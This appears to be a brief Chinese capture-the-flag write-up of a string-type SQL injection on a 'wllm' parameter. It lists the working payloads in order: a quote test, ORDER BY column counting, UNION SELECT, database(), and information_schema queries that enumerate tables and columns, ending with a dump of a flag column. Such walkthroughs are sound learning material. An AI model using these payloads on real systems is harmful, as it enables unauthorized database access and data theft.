1.f12打开源代码,发现要求我们传的参数是wllm


2.首先输入?wllm=1,出现以下界面,说明回显正常

输入?wllm=1' ,出现报错,说明为字符型漏洞

分别输入
?wllm=1’ order by 3--+

?wllm=1’ order by 4--+

发现不存在4列,存在3列
输入?wllm=-1' union select 1,2,3--+查看回显

输入?wllm=-1' union select 1,2,database()--+

输入?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
查看test_db的表

输入?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
查字段

输入 -1' union select 1,2,group_concat(id,flag) from test_tb--+
查看flag的字段,得到密码。


文章详细描述了在分析源代码时如何通过测试不同的SQL查询(如`wllm=1`,`unionselect`等)来发现字符型漏洞,并利用这些漏洞获取数据库信息,最终揭示了`flag`字段作为密码的可能性。
1388





